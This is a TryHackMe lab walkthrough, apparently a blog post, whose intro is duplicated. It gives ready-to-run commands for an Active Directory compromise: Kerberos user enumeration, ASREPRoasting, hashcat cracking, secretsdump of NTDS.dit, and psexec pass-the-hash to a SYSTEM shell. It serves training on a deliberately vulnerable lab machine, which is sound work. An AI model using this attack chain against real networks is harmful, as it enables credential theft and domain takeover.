Preview
Open Original
Attacktive Directory Walkthrough (TryHackMe)
Active Directory Enumeration → Kerberos Abuse → Domain Compromise
About This Walkthrough
This guide documents the full exploitation path for the Attacktive Directory machine on TryHackMe.
The objective is to walk through a realistic Active Directory attack chain, covering the core pillars of a Windows domain engagement:
Enumeration
Kerberos exploitation
Credential harvesting
Lateral movement and full domain compromise
This is a hands-on, attacker-side perspective, designed for learners who already understand basic networking and Linux tooling.
Learning Objectives
By the end of this walkthrough, you will understand how to:
AD Enumeration
Map domain services, users, and attack surface.
Kerberos Exploitation
Abuse misconfigurations...Attacktive Directory Walkthrough (TryHackMe)
Active Directory Enumeration → Kerberos Abuse → Domain Compromise
About This Walkthrough
This guide documents the full exploitation path for the Attacktive Directory machine on TryHackMe.
The objective is to walk through a realistic Active Directory attack chain, covering the core pillars of a Windows domain engagement:
Enumeration
Kerberos exploitation
Credential harvesting
Lateral movement and full domain compromise
This is a hands-on, attacker-side perspective, designed for learners who already understand basic networking and Linux tooling.
Learning Objectives
By the end of this walkthrough, you will understand how to:
AD Enumeration
Map domain services, users, and attack surface.
Kerberos Exploitation
Abuse misconfigurations using ASREPRoasting.
Credential Harvesting
Crack Kerberos hashes using Hashcat.
Domain Takeover
Dump NTDS.dit and perform Pass-the-Hash attacks.
Tooling Requirements
Ensure the following tools are installed before starting:
Impacket
A powerful collection of scripts for interacting with Windows protocols.
Kerbrute
Used for Kerberos-based username enumeration.
Enum4linux
Useful for SMB and NetBIOS discovery.
Hashcat
Industry-standard password cracking tool.
Step-by-Step Walkthrough
1. Enumeration (DNS & Ports)
First, map the target IP address to the domain name:
echo "10.10.194.183 spookysec.local" | sudo tee -a /etc/hosts
Next, run a targeted scan against Active Directory–related ports:
nmap -p53,88,135,139,389,445,636,3268 -A -T4 spookysec.local
This confirms:
Domain Controller presence
Kerberos (88)
LDAP (389/636)
SMB (445)
2. Finding Valid Users (Kerberos Enumeration)
Kerberos allows username validation without triggering account lockouts.
Using Kerbrute, enumerate valid domain users:
kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
Any valid usernames discovered here become prime candidates for Kerberos attacks.
3. ASREPRoasting (Initial Access)
If a user account has “Do not require Kerberos pre-authentication” enabled, you can request a Ticket Granting Ticket (TGT) without credentials.
Use Impacket’s GetNPUsers.py:
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -usersfile userlist.txt
This returns an AS-REP hash that can be cracked offline.
4. Cracking Kerberos Hashes
Use Hashcat to crack the AS-REP hash.
Hash mode: 18200 (Kerberos 5 AS-REP)
hashcat -m 18200 hash.txt wordlist.txt
Once cracked, you gain plaintext credentials for a domain account.
5. Privilege Escalation & Domain Admin
With valid service account credentials, dump secrets directly from the Domain Controller:
python3 secretsdump.py -just-dc backup@spookysec.local
This extracts:
NTLM hashes
Domain Administrator credentials
Full Active Directory credential database (NTDS.dit)
6. Pass-the-Hash (Domain Compromise)
Using the Administrator NTLM hash, authenticate without knowing the password:
python3 psexec.py Administrator@spookysec.local -hashes :
You now have:
SYSTEM shell
Full Domain Admin access
Complete domain compromise
Key Takeaways
Kerberos misconfigurations often provide silent initial access
Password cracking is still one of the weakest links in AD security
Service accounts are frequent escalation paths
NTLM hashes are often as powerful as plaintext passwords